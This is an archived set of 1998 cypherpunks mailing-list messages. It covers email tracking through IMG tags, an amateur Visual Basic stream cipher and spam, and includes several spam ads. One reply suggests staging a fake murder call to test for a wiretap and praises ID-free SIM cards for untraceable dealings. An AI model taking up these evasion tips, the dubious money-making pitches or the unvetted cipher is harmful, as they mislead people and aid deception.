Date: Wed, 18 Feb 1998 02:05:10 -0800 (PST)
To: user@yourdomain.com
Subject: Sneak Preview!!!
Message-ID: <199802182461ZAA53904@post.sec.com.sg>
MIME-Version: 1.0
Content-Type: text/plain


CLICK HERE
with the word GO in the subject line
for a sneak preview of an incredible new website
with over 200,000 music CDs, cassettes and more,
at the lowest prices on earth.  For example:

* "Show Me Love" CD single by Robyn
* elsewhere $3.95; our price $2.63

* "Tubthumping" CD by Chumbawumba
* elsewhere $12.99; our price $10.40

* "To the Moon & Back" cassette by Savage Garden
* elsewhere $3.99; our price $2.48

We ship worldwide with low shipping charges,
usually $3 for up to six CDs or cassettes.

You must CLICK HERE
with the word GO in the subject
line to receive advance notice.  You will *not*
receive future e-mail from this address unless
you reply.










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Wed, 18 Feb 1998 01:06:30 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: I was auto-outed by an IMG tag in HTML spam
In-Reply-To: <37a52bf54844994eb90c8e8af06b07b7@anon.efga.org>
Message-ID: <199802180937.EAA10267@users.invweb.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In <37a52bf54844994eb90c8e8af06b07b7@anon.efga.org>, on 02/18/98 
   at 03:00 AM, Anonymous <anon@anon.efga.org> said:

>Use mail readers that don't automatically process HTML and
>connect to image servers, accept cookies, or run javascripts.  You are
>being watched by tricky defective, er, detective types. es.

Several things here:

1. HTML in mail:

There is just no place for this crap in e-mail. If multipart/alternative
is used it is tolarable but pure text/html messages go into the bitbucket
with a autoreply explaining to the poster the error of their ways. :)

I was pleasently suprised that MS Outlook actually makes use of the
multipart/alternative format (M$ actually got it right for once). Net$cape
does not and will blindly send out text/html messages (after all everyone
uses a web browser to read their mail) and Eudora was doing the same thing
though they may have fixed this (I talked to John about this when I was at
the IETF in DEC).

2. AutoProcessing of Attachments:

This is *allways* a BadThing(TM). Not only is it an obvious security risk
it is a PITA for the user. I would be rally pissed if my mailer launched a
V-Card app everytime someone thought it was a GoodThing(TM) to add these
attachments to every message they sent out.

3. AutoDownloading of Data:

I imagine what happend here is the internal logic for N$ mailreader when
processing a html/text e-mail message is to treat it just like a WebPage
and processes it accordingly.

IMHO a mail client that is going out to an external site to DL data wether
it be part of a html/text message or Message/External-Body the mailer
should prompt the user on wether or not he wishes to retreive the data.

My recomendations is to dump the Netscape garbage and get a real e-mail
client. Netsacpe has done a good job at screwing up the web we really
don't need the same favor from them with e-mail.

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://users.invweb.net/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 2.6.3a at: http://users.invweb.net/~whgiii/pgpmr2.html                        
- ---------------------------------------------------------------
 
Tag-O-Matic: Friends don't let friends use Windows.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNOqWz49Co1n+aLhhAQE77gP/U2a/px/oEZGr9HD/FXvmzHH1DGF2E3mx
0WApF3FX2Y6s0MwBaY/t/YisZwyjki6T/xSqd2qVuADeh5sdXYN9Fd6sIon42SX2
4PBvq+HjsKNKlptASjN3x0l3RK8l7Yis47gB3igiA8m8JKMyevm7Vu1bhg572PTA
Kfy8V1J9gYI=
=onje
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <anon@anon.efga.org>
Date: Tue, 17 Feb 1998 23:55:29 -0800 (PST)
To: cypherpunks@toad.com
Subject: I was auto-outed by an IMG tag in HTML spam
Message-ID: <37a52bf54844994eb90c8e8af06b07b7@anon.efga.org>
MIME-Version: 1.0
Content-Type: text/plain


I just had my on-line pseudonym outed to my company's VP of
marketing, with potentially serious internecine political
consequences.  It didn't even take an AOL customer service rep
to do the dirty deed.  Here's how it happened.

I have an account unconnected with work, for personal mail, on a
machine run by a friend in my wife's department at the local
college.  From this account, I speak my mind about my political
views, my employer's spamming of their rather loosely defined
lists of "customers", etc.  I don't do that from my work account
because I don't want any confusion about whether I am speaking
for the company or not.

Evidently my mention of my displeasure with my company's
spamming hit a nerve with marketing.  They sent a message to my
off-site address (along with those of other critics about whom
they wanted to know more).  It was an HTML message with an
embedded IMG tag.

Last night about midnight, I downloaded my off-site mail with
Netscape.  (I was still at work because our team is debugging
some killer database problems.)  When Netscape saw that IMG
tag, it happily connected to marketing's "customer" tracking
server, and downloaded the keyed graphic.

My boss just let me see the log he got from the marketing VP,
showing clearly that my workstation read the message.  The log
was attached to a strident call for my head from the VP. 
Luckily, my boss agrees with my attitude, as do all of my
co-workers on the engineering side of the house, and thinks I
was in the right to use an off-site account.  But the political
fallout could be interesting.

Beware "live" message content.  If you don't, you may end up
having to get your company's entire marketing force fired to
protect yourself.

Use mail readers that don't automatically process HTML and
connect to image servers, accept cookies, or run javascripts. 
You are being watched by tricky defective, er, detective types.
es.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: 77224.who@cygnus.com
Date: Wed, 18 Feb 1998 03:07:31 -0800 (PST)
To: 77224.friend@cygnus.com
Subject: 167 business and financial reports -53016
Message-ID: <199802181107.DAA12232@cygint.cygnus.com>
MIME-Version: 1.0
Content-Type: text/plain


////////////////////////////////////////////////////
If you wish to be removed from this advertiser's future mailings, please reply with the subject "Remove" 
and this software will automatically block you from their future mailings.
///////////////////////////////////////////////////


To: ENTREPRENEUR		
     From:    REGINALD J. WILLIAMS	
     Subject: 167 BUSINESS REPORTS
    
        I WILL SEND YOU A POWERFUL, MONEY-MAKING COMPUTER DISK   AND A SPECIAL REPORT  
ENTITLED "HOW TO MAKE $100,000 IN 100 DAYS".  YOU JUST PAY $10.00 FOR YOUR ONE-TIME 
REGISTRATION FEE AND SHIPPING COST.
Dear Entrepreneur:
        In the most recent "Richest People In America" survey published by  Forbes  Magazine, the richest 
man in America IS NOT in the real estate business. He IS NOT an oil tycoon, and he DOES NOT own an 
airline or an automobile company.
        The richest man in America is Bill Gates, with an estimated net worth of around 29.9 BILLION. His 
business: COMPUTER SOFTWARE. Bill Gates founded Microsoft, the largest computer software company 
on planet Earth.    This is clear proof that the "computer revolution" is finally here, bringing exceptional 
opportunities that are creating millionaires out of ordinary people like me and you every day.   Recently, I 
received in the mail this computer disk which contains 167 business and financial reports which I can sell 
to people for around  $1.00 to $5.00 per report. That's quite attractive considering that the disk contains 
167 reports. However, for me that was like trying to peddle bananas by the piece, and I didn't get to excited 
with the idea.
        HOWEVER, WHEN THE COMPANY WHO DEVELOPED THE DISK, SAID THAT I CAN ACTUALLY MAKE 
EXACT COPIES OF THE DISK, AND SELL THEM TO OTHER PEOPLE AT ANY PRICE I WANT, I KNEW THAT I 
HIT THE JACKPOT.
        You see, selling how to reports and information by mail is an old and established business. What's 
new is the way information is being packaged, sold and delivered. From ordinary paper and ink (printed 
format) to computer floppy disks (electronic format), INFORMATION HAS GONE HIGH-TECH.
        So here's what I will do for you when registering for my "computer disk business package"...        
upon receipt of your $10.00 one-time only registration fee, I will send you the following:
        1. A high density 3.5" computer disk which contains all 167 
business and financial reports.
        2. A sample sales letter and  sample camera - ready print ads which you can use to get people to 
order copies of the reports & the disk from you.
        3. A step-by-step plan on how and where to make copies of this 
disk, and how to get people to order copies of the disk - direct from you- 
and pay you anywhere from $20.00 to $49.00 each (you set your own price.) 
       
	4. Most importantly A Duplication License which grants you the 
right  to reproduce copies of the disk and the printed materials that come 
with it.
        Please include $10.00 cash, check, or money order (U.S.Funds Only).
If you would like to receive your package via Priority Mail, please add 
$4.00 (total of $14.00).

        PLEASE TAKE A MOMENT TO SEND IN THIS OFFER. IT IS SUCH A SMALL INVESTMENT FOR THE 
KNOW-HOW, EXPERIENCE AND FINANCIAL REWARDS YOU WILL GAIN THROUGH THIS PACKAGE. ALSO 
ALL ORDERS RECEIVED,  WILL  RECEIVE A FREE COPY OF ENVELOPE FOR WINDOWS, (A $29.95 
VALUE).   AN EXCELLENT RATED ENVELOPE  ADDRESSING PROGRAM.  (SPECIFY LASER OR DOT 
MATRIX) LASER___  OTHER____

SEND ORDER AND REGISTRATION FEE TO: 
        REGINALD J. WILLIAMS
        POST OFFICE BOX 42091
        FREDERICKSBURG, VA 22407-2091
         (540)  972-0903 
________________________________________________________________________                         

                                                  ORDER FORM

NAME_____________________________________________

ADDRESS_________________________________________APT#

CITY____________________________STATE___________

POSTAL ZIP+4__________________

SPECIFY DISK SIZE 3.5____    5.25______ IBM PC COMPATIBLE ONLY

SPECIAL OFFER: Free INTERNET advertising !!! Free with your purchase of 167 Business and Financial 
Reports, 3 months of INTERNET advertising- your 40 word classified ad will be included in an electronic 
magazine (e-mag) for entrepreneurs. Your ad can contain any ad content you wish, and will run for a 
minimum of 3 months absolutely free. This alone can save you hundreds of dollars on ad placement, so act 
today free ads will only be offered for a limited time. THANKS RJW 


SPECIAL 1\2 PRICE SALE ; PURCHASE WITHIN 72 HOURS AND PAY ONLY $5.00 FOR YOUR COMPLETE 
PACKAGE

GET Paid for your SPAM!  New and HOT.  Signed up over 250 the first day.
Now you can profit with "SPAM"  Bulk email with no risk, and make a small
fortune at the same time!  THIS ONE IS A NO-BRAINER!  Really, Check it out
http://wasi.com/spamaddress/info.idc?reg=1953

PRELAUNCH !!      HOT !! HOT OFF THE PRESSES!!

Secure your position Now..  Free sign up with Free Self-Replicating
Webpages for your Downline. Awesome Opportunity for '98.
Join now in my website and ask questions later.. It is FREE.
Please browse and sign up at;
 http://globalads.com/gfn-prelaunch/rjwilliams






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Tue, 17 Feb 1998 19:04:31 -0800 (PST)
To: cypherpunks@toad.com
Subject: description of my stream cipher
Message-ID: <199802180304.EAA02881@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Subject:      description of my stream cipher
From:         Jouni Vuorio <Jouni.Vuorio@vtoy.fi>
Date:         1998/02/17
Message-ID:   <34E9D794.371@vtoy.fi>
Newsgroups:   sci.crypt

[Subscribe to sci.crypt] 
[More Headers]


Here is description of my stream cipher, it operates one
byte at time, instead of one bit at time.
its key length is up to 255 bytes (2040 bits)

im sure that there are no need for longer description,
becourse that vb source code explanes details.
only thing that could be difficult to understund is
Asc(Mid(Text2, R2 - 1, 1)) that simppely means that
take asci value from text (in this case string text2)
starting from R2 - 1 and length of 1. i think that
everyone understunds the rest.


VB source code:

Initializing the substitution-box
On Error Resume Next

D = Len(Key)
R = 1

For R2 = 1 To 256
H1 = Asc(Mid(Text2, R2 - 1, 1))
K1 = Asc(Mid(Text2, R, 1))
K2 = Asc(Mid(Text2, D Mod Len(Text2), 1))
K3 = Asc(Mid(Text2, D * R Mod Len(Text2), 1))
K4 = Asc(Mid(Text2, R + D Mod Len(Text2), 1))

R1 = ((R1 + R2 + K + 1) Xor (R1 * R2 + 1)) Mod 256
R3 = ((R3 + R1 + 1) + R2 + (R1 * K + 1 Mod (R3 + R1 + 1))) Mod 256
R4 = (R4 + R3 + R1 + 1) ^ 2 Mod 256

R = R + 1
If (R - 1) = Len(Text2) Then R = 1

C = (C + (H1 + K1 + K2 + K3 + K4 + D + R1 + R3 + R4) Mod 256) Mod 256
C = C Mod 256


SBox = SBox & Chr(C Mod 255 + 1)
Next






On Error Resume Next

Key = Text2
texti = Text1
Text1 = ""


R = 1
S1 = Len(Key)
S2 = 11
For R2 = 1 To Len(texti)
C = Asc(Mid(texti, R2, 1)) - 1
K = (K + Asc(Mid(Key, R2 Mod Len(Key), 1))) Mod 256
K = (K + Asc(Mid(SBox, (((K * R2 Mod 256) - 255) * -1) Mod 257, 1))) Mod
256

R1 = ((R1 + R2 + K) Xor (R1 * R2)) Mod 256
R3 = ((R3 + R1) + R2 + (R1 * K Mod (R3 + R1))) Mod 256
R4 = (R4 + R3 + R1) ^ 2 Mod 256


F1 = (F1 + (Asc(Mid(SBox, R1 Mod 256, 1)) Mod 256) Mod 256)
F2 = (F2 + (Asc(Mid(SBox, R2 Mod 256, 1)) Mod 256) Mod 256)
F3 = (F3 + (Asc(Mid(SBox, R3 Mod 256, 1)) Mod 256) Mod 256)
F4 = (F4 + (Asc(Mid(SBox, R4 Mod 256, 1)) Mod 256) Mod 256)
F5 = (F5 + (Asc(Mid(SBox, K Mod 256, 1)) Mod 256) Mod 256)
temp = F1 + F2 + F3 + F4 + F5 + M Mod 256
F = (F + (Asc(Mid(SBox, temp, 1)) Mod 256) Mod 256)

M = M + 1
If M = 2 Then M = 0


If M = 0 Then C = C Xor ((F + K) Mod 256)
If M = 1 Then C = C Xor ((((F + K) Mod 256) - 255) * -1)


C = (C Mod 256) + 1


Mid(texti, R2, 1) = Chr(C)
Next



Text1 = texti

-- 
Jouni.vuorio@vtoy.fi             GSM 050-5456235
PahaeNTeist soNTaa viNTit peNTteihin aseNTavat...






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Trei, Peter" <ptrei@securitydynamics.com>
Date: Wed, 18 Feb 1998 07:19:48 -0800 (PST)
To: "'Anonymous'" <cypherpunks@toad.com
Subject: RE: I was auto-outed by an IMG tag in HTML spam
Message-ID: <6B5344C210C7D011835C0000F8012766010035D1@exna01.securitydynamics.com>
MIME-Version: 1.0
Content-Type: text/plain


This can also happen with embedded tags in news messages,
if you use Netscape to read news while 'autoload images'
is turned on.

It's an interesting form of entrapment. 

Peter

> -----Original Message-----
> From:	Anonymous [SMTP:anon@anon.efga.org]
	[Trei, Peter]  [edited]
> They sent a message to my
> off-site address (along with those of other critics about whom
> they wanted to know more).  It was an HTML message with an
> embedded IMG tag.
> 
> When Netscape saw that IMG
> tag, it happily connected to marketing's "customer" tracking
> server, and downloaded the keyed graphic.
> 
> My boss just let me see the log he got from the marketing VP,
> showing clearly that my workstation read the message.  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "awbd@awbd.com" <awbd@awbd.com>
Date: Wed, 18 Feb 1998 10:17:51 -0800 (PST)
To: (Recipient list suppressed)
Subject: Commercial delegate in Egypt
Message-ID: <199802181900.LAA24797@ghs1.greenheart.com>
MIME-Version: 1.0
Content-Type: text/plain


Feb. 18th 1998. 

.                   

Dear Sirs,
     
I have the pleasure to enclose herewith a copy of my C.V. introducing myself
to you as a person of very good experience in Freight Forwarding &
International Transportation and in the different commercial services
related thereto; and proposing myself for representing your company in Egypt
and the Middle East as its own local resident COMMERCIAL DELEGATE looking
after your interests and projects in this area.
As a matter of fact, among lots of investors, many international freight
forwarding & transportation companies have started their own presence in
Egypt seizing the opportunity of the economic reformation achieved in this
area; as now is the right time for business starting in Egypt.
Starting with Commercial Delegation I foresee our final target, in case my
proposal meets your interest, is to develop that delegation into the full
operating company's branch in Egypt. That is to be achieved gradually by
time, but as quickly as possible, through building a good account of clients
and by selecting and training an efficient professional work team.
In addition to my  qualifications shown in my enclosed C.V., I am actually a
USA resident as per the Green Card I have got for lawful admission for
permanent residence in America (Employment Authorized). Such advantage is
considered as a good asset for a person appointed by an American company to
represent it as its own Commercial Delegate in the area where he was grown
up. Speaking their own language and understanding their mentality and the
way they think, such delegate can move among the company's correspondents &
agents, its clients, the local official authorities, and any other concerned
parties to intervene, for his company's favor, to avoid any probable
problems and to enhance the company's achievements in this area.
For any further details and/or information, please feel free and do not
hesitate to contact me through any of the contact means listed among my
personal data in my C.V. attached hereto. You may also contact me, for the
time being and until Feb. 24th when I leave back to Egypt, through my
address in USA which is as follows:
915 Mount Olive Dr.  #3
Duarte,   CA 91010
Tel & Fax (626) 357 0243
E-mail: info@awbd.com
Looking forward to getting the honor of working with your esteemed company,
I wish you all the best and remain
faithfully yours. 


 Isaac  Youssef


CURRICULUM VITAE
PERSONAL DATA:

Name:			   Isaac Youssef Atiya
Nationality; 		   Egyptian
Place and date of birth:    Cairo, On Oct. 5th 1951
Marital Status:		   Single
Education Degree:	   B.Sc. Cairo University
Contact Address:	   PO Box  #15
			   Al- Afdal Post Office
   Cairo-11627,  Egypt.

Tel:			   00202-235-3997
Fax:			   00202-236-7413
E-mail:                            andyeg@eis.egnet.net 	 
 
JOB HISTORY & BUSINESS EXPERIENCE:

Jan. 1st. 94 - Currently:
PARTNER and MANAGER of CFT Int'1., CENTRE DU FRET ET DU TRANSPORT
INTERNATIONAL, which is actually an extension of GONDRAND Egypt     (A
former company mentioned below). As CFT Int'l., I represented the following
companies:
= SDV group, including SCAC, TTA, & ATT				France 
= TRANSCAP INTERNATIONAL					France
= GEFCO								France

Aug, 15th 91 - May 31st  94
The GENERAL MANAGER, and the only ACTIVE PARTNER of GONDRAND Egypt, one of
the most leading freight forwarding agents and the international transport
companies working in Egypt. As GONDRAND Egypt, I was the agent of many world
wide companies such as :
= S.F.T. GONDRAND FRERES					France
= MACH + 								France
= SAVING SHIPPING & FORWARDING 				Italy
= UTC, UNION TRANSPORT CORPORATION			USA
= UAT, UNION AIR TRANSPORT					Europe
= DSL, DISTRIBUTION SERVICES LTD				USA
= GEFCO								France
= TRUST FREIGHT							USA


Sep. 1st  88 - Aug. 14th 91:
During that period, besides managing an export- import group consisting of 3
sister companies, I worked in the following companies:
= DMC, the Egyptian daughter company of DOLLFUS MIEG ET CIE, one of the most
leading world wide French threads manufacturers, in which I worked as the
MATERIALS / INFORMATION FLOW & PURCHASING MANAGER. My duties included the
following:
1-  Supplying and furnishing both of the clients of the company and its
employees with whatever they needed of information, materials, services, and
/or products.
2-  Controlling the flow of all the materials imported or locally purchased.
3-  Supervising the import formalities and regulations with Banks, Customs
and Governmental authorities, Air and Maritime lines, and Freight Forwarding
agents.
4-  Supervising purchasing and maintenance of the company assets through
different contractors, suppliers, and services companies.
5-  Controlling the circulation of raw materials and products.
= AMECO, an Egyptian freight forwarder which, in the same time, represents
ships owners. In AMECO I had the position of the ASSISTANT MANAGER of Cairo
branch.    
= MEDTRANS, The Egyptian correspondent of a group of European and American
freight forwarding companies, such as the French company S.F.T. GONDRAND
FRERES, And the American company DANIEL F. YOUNG Inc.. In MEDTRANS I had the
position of the EXECUTIVE MANAGER.

Feb. 1st 80 - Aug. 31st 88 :
A SUPERVISOR and a DEPARTMENT HEAD in MFA - MISR FREIGHT AGENCIES - The
Egyptian branch of the world wide DANZAS company for international
transportation and freight forwarding - which had, at that time, 450 offices
distributed in 42 countries with the head office in Switzerland.
In MFA- DANZAS Egypt - I supervised the following departments:
1-  Sea Freight Dep. (Conventional and General Cargo, and Containerized
Shipments).
2-  Air Freight Dep.
3-  Projects Transport Dep.
4-  Transit Goods & Distribution Dep.
5-  Fairs & International Exhibitions Transport Dep.
6-  The Local Operations & Inland Road Transport Dep.
7-  Besides the above, I supervised some special inter-branches relations
between MFA and the other world wide branches of DANZAS group.
      
Before MFA was founded, I worked in the above capacities for the COMMERCIAL
DELEGATION OF DANZAS in Egypt.




Sept. 78 - Jan. 31st 80:
	The DIRECTOR ASSISTANT of CENTER FOR EGYPTIAN CIVILIZATION STUDIES, in
which I supervised the following:
1-  Planning & Execution of programs
2-  Administration
3-  Public Relations
4-  Correspondence
5-  Translation

OTHER QUALIFICATIONS:

= Courses in MANAGEMENT SKILLS FOR SUPERVISORS AND DEPARTMENT
HEADS organized by Monadonck International Limited - London, for
International Management Development.
=  A seminar and a long training course in PROJECTS TRANSPORT, SEA FREIGHT,
and INLAND ROAD TRANSPORT in  DANZAS  branch in Zurich city, and in  AIR
FREIGHT in its branch in Kloten airport of Zurich.
= Courses in BUSINESS ADMINISTRATION including FINANCE FOR NON- FINANCIAL
MANAGERS, AN INTRODUCTION TO COST ACCOUNTING, and BASIC PRINCIPLES OF
FEASIBILITY STUDIES. These courses were organized by The Egyptian-German
Association for Economical and Social Development of The Arab-German Chamber
of Commerce in Cairo, among the Business Administration Program in Egypt
sponsored by Konrad-Adenauer Foundation.
=  Write and Speak English language.
=  Some courses in French language, and still studying.
= Traveled in Business Trips to many  countries, such as Switzerland, UK,
France, Germany, Turkey, and USA.
=  Active, Head Working, Ambitious, and willing for constant movement &
traveling.
=  Fond of creating new businesses in Egypt.

    Signature 

Isaac Youssef


PS:
Besides the ordinary transport activities and the services related to the
freight forwarding business, I represent my clients in the various official
authorities, e.g. Customs Authority; Investment Authority, General
Organization for Fairs & International Exhibitions, Egyptian General
Petroleum Corporation, National Authority for Wire and Wireless
Communications, Traffic Administration, The Import Rationalization Committee
of the Ministry of Foreign Trade, Banks, Embassies, and Chambers of
Commerce......etc.. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David Lopes" <caos@mail.telepac.pt>
Date: Fri, 20 Feb 1998 13:57:23 -0800 (PST)
To: <cypherpunks@toad.com>
Subject: No Subject
Message-ID: <000701bd3c71$98a40920$c2e941c2@vladimix>
MIME-Version: 1.0
Content-Type: text/plain




Subscribe


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nightmare <alexm@smug.adelaide.edu.au>
Date: Tue, 17 Feb 1998 21:38:47 -0800 (PST)
To: jkwilli2@unity.ncsu.edu
Subject: Re: bugged?
In-Reply-To: <Pine.SOL.3.96.980216061644.7638A-100000@c00953-100lez.eos.ncsu.edu>
Message-ID: <199802180534.QAA07609@mulder.smug.adelaide.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


> 
> anybody have any ideas here?  this is a personal email forwarded to me
> from a friend who *might* have cause to believe he is bugged.  this is
> coming from a .au domain, btw.
> 
> thanx,
> 
> TATTOOMAN
<snip> 
> I got pgp 5.0. which will not work with your version. Upgrade man :-)
> 
> Oh well I'll tell ya without pgp. It's not that much of a problem the
> question I wanted to ask you (well I hope it's not).
> 
> Anyway, what I wanted to ask you is whether you might know why I'm getting
> a very DISTINCTIVE beep when I connect with my modem to my ISP. The
> beep(only once) comes just after the initial dialup and just before all the
> noise you get before the connection. 
> 
> Sounds wierd and it only started 2 days ago. I never heard a connection
> like this before and I'm wondering whether my phone line is being tapped. 
> 
> Any suggestions ??
> 
> XXXXX
> 
> P.S. Just in case my mail is being read by someone other than
> Tattooman..here's to you (_|_)
> 

What have you been doing wrong??  :)

Anyway suggestions are;

1) You can use a voltage check , if you want, but there are ways around that..

Someone actually emailed the list a while back re overcoming this problem,
email me privately if you are still looking and ill dig up the schematics
for it for you. but you can use a modified power up system to maintain the
initial voltage level.

2) Or, have fun with the possibilty.

Get a good friend in with you, one you can trust, and one you can ring at 
any hour..

It takes upto two weeks to transcribe a recorded phone conversation, unless
you are involved with drugs. which is the next part of the good time. talk about
drug dealing and arms trading , prostition etc, with your friend for the next 2-3
weeks. he can call you from a public phone.
then one night ring him up, in a mad panic, claiming that you just 
caught somone trying to break into your house, and you clubbed him over
the head and killed him. then make plans for him to help you dispose of
the body and have a human shaped "thing" in a bag that you can then carry out
at night to his car..

If your phone is being taped you should have a police escort all ready to help
you load the car...

Time consuming but a sure thing  ;)
trust me...

The other option is using a reprogrammed mobile phone for just those kind of 
conversations, but thats naughty....

or buying the optus card package, aus only, for about $70-00, which gives
you a simm card and sixty dollars worth of calls.. phone is not supplied.

hurry though, as the feds want these cards to be name registered, as they can 
presently be bought with no ID.. great for those untraceable dealings...

Well thats about it without thinking.

If you need help , to tattooman's friend, email me privately.
from one OZ to another..

Seeya.

--------------------------------------------------------------------------------
    _/    _/ _/_/_/  _/_/_/  _/    _/ _/_/_/_/ _/    _/  _/_/_/  _/_/_/   _/_/_/
   _/_/  _/   _/   _/    _/ _/    _/    _/    _/_/_/_/ _/    _/ _/    _/ _/
  _/ _/ _/   _/   _/       _/_/_/_/    _/    _/ _/ _/ _/_/_/_/ _/_/_/   _/_/
 _/  _/_/   _/   _/  _/_/ _/    _/    _/    _/    _/ _/    _/ _/    _/ _/
_/    _/ _/_/_/   _/_/_/ _/    _/    _/    _/    _/ _/    _/ _/    _/ _/_/_/
                     _/   "The meek shall inherit the Earth,
                  _/_/     But it is the strong and powerful who shall rule it"
-------------------------------------------------------------------------------



                                                 
                                                   

   




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: overseas@4link.net
Date: Thu, 19 Feb 1998 02:33:35 -0800 (PST)
To: Friend@public.com
Subject: AN EXCITING OVERSEAS JOB IS WAITING FOR YOU!
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain


CAPITALIZE ON YOUR TRUE WORTH!
**********************************************************************
Earn up to $72,000 (US Dollars) annually tax-free working abroad!
Yes, by law you are entitled to earn up to $72,000 in annual earnings
working outside of the US without paying any US income taxes.
**********************************************************************

Hundreds of companies are aggressively hiring American talent for
lucrative jobs worldwide.  After extensive research, INTERNATIONAL
RESEARCH & DATA INSTITUTE (IRDI) is now publishing its latest
edition of a directory which will provide you with key leads to a specific
recruiter or employer that can offer you a fantastic overseas career
opportunity.

International Search Firms: IRDI's Directory of International Recruiters
and Employers has a section which provides up-to-date detailed
information on executive search firms all over the world which are
currently seeking qualified candidates to fill positions for their client
companies. If they place you with one of their clients, the client pays
their search fee. It's a total win situation for you!

International Direct Job Opportunities: Our Directory has a separate
section which provides key leads directly to companies which are
currently seeking capable candidates to fill positions which they have
available outside of the US. This section includes names of staffing
executives, addresses, phone numbers and describes the types of jobs
being offered.

The listings in IRDI's Directory cover many fields:

Accounting* Chem./Petrochemical* Engineering* Oil & Gas* Advertising*
Communications* Environmental* Pharmaceuticals* Agriculture* Computers*
ESL/Education* Programming* Architecture* Contract/Admin. * Finance*
Banking* Public Relations* Automotive* Construction* Health Care*
Transportation* Aviation/Aerospace* Data Processing* Human Resources*
Business* Travel/Tourism* Management* Electronics* Nursing* Marketing*
Sales* Hospitality*
AND OTHERS!

If your target field is not listed above, contact us and we will research and
guide you to positions that are available, or feel free to email or call us
should you have a question. Email us at Research@overseaswork.com,
or email us from our website; http://www.overseaswork.com

Get the edge by acquiring our up-to-date Directory.  If you are a skilled
individual these companies would love to hear from you. They spend
hundreds of hours and tens of thousands of $$$$$$$ looking for talented
people like you in the following geographical areas:

Europe* Central America* Australia* Canada* Pacific Islands* South
Africa* Middle East* South East Asia* Japan* South America* Caribbean*
Brazil* Far East* China* Malaysia* Russia*

Our detailed guidelines will assist you to apply for overseas jobs listed with
IRDI's Directory.  Included are foreign-based and US corporations with
thousands of current openings outside of the US. Most employers will pay
for your relocation expenses.  Your food, accommodations and
transportation to your new career position are all usually included in a
package offer, as well as several weeks of annual paid vacation and
other benefits for you and your family.

Our Directory listings are continually updated from leading worldwide
on-line databases and regular contact with international employers and
search firms. We will provide you our Directory of International Recruiters
and Employers for only $39.95 (shipping and tax included).

We want to do all we can to make your new career in the international
marketplace a resounding success!  If you wish, we can provide you
with an effectively composed internationally formatted resume at an
affordable price!  Please fax us your fully completed international resume
worksheet (which you will find at the end of your Directory),
and we will call you with a quote.

Once your resume is prepared, we can also mail your resume to your
selected targets at a nominal expense over our direct out-of-pocket
costs (e.g. postage, stationery, printing, etc.).
Our Fax is (213) 380-1288 Phone: (213) 385-0557, or (213) 385-8388

THIS WILL BE THE FIRST STEP IN THE MOST IMPORTANT
CAREER DECISION OF YOUR LIFE!  ORDER NOW!

Send check or money order for $39.95 payable to:

International Research & Data Institute
Attn: Research Department
Howard Hughes Center, Fifth Floor
6601 Center Drive West
Los Angeles, CA 90045

Please include your name, return address & telephone number.

********************************************************************************
Obtain the current issue (via COD); Send us an inquiry to our address
above, or call us at (213) 385-0557. After business hours please leave
a message giving us your name, address and phone number. You can
also Email us your COD order to;
IRDI@overseaswork.com (please put "COD Order" as the subject)

Directory of International Recruiters and Employers,
via COD is $49.95, (tax, shipping and COD charges included).
********************************************************************************

P.S. Feel free to visit our Web Site and learn more about us @
www.overseaswork.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jenni@biznetandmarketing.com
Date: Wed, 18 Feb 1998 12:44:29 -0800 (PST)
To: chris@ste.net.de
Subject: your request
Message-ID: <42719674_84637763>
MIME-Version: 1.0
Content-Type: text/plain



Thank you for your request.  

You can now:

1. Get more hits to your website for FREE! Win 1,000,000 banner impressions on thousands of websites! (worth $10,000)

2. Download the Internet Biz Startup Kit FREE! (Worth $95)

3. Download Web-Traffic's guide to listing your URL on top of search engines FREE! Touted as the world's Best Web and Hits Resource. (worth $95)

4. Win Astro-Space's Virtual Web Server with 75 MB space, and unlimited pop, autoresponders, telnet, ftp, domains, etc. (worth $1195)

ALL of these at: http://www.free-banners.com


Best Regards,

Jenni LR

--------------------------------------------------------
*          This is an autoresponded message.           *
--------------------------------------------------------









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sunder <sunder@brainlink.com>
Date: Sat, 21 Feb 1998 08:53:56 -0800 (PST)
To: Information Security <guy@panix.com>
Subject: Re: Is spam really a problem?
In-Reply-To: <199802182107.QAA00482@panix2.panix.com>
Message-ID: <34EC98A6.363D0100@brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain


Information Security wrote:

>    >   From sunder@brainlink.com Wed Feb 18 15:58:46 1998
>    >
>    >   Anonymous wrote:
>    >   >
>    >   > I see discussion of spam here and everywhere on
>    >   > the net. But who finds it a *real* problem, and
>    >   > why?
> 
> Why are you asking the cypherpunks list?

I didn't. Anonymous did.  
 
>    >   There are nice technical solutions to this.  If sendmail didn't transport
>    >   things unauthenticated it could be done, but at a cost in CPU cycles on mail
>    >   servers:
>    >
>    >   Have every sendmail server use a PK scheme to talk to every other
>    >   server and authenticate the connection.  Have every sendmail server accept
>    >   mail only from those whose key is verified.
> 
> Nonsense.
> 
> We (NANA) already know where spam comes from,
> and when we complain about it, they are terminated.

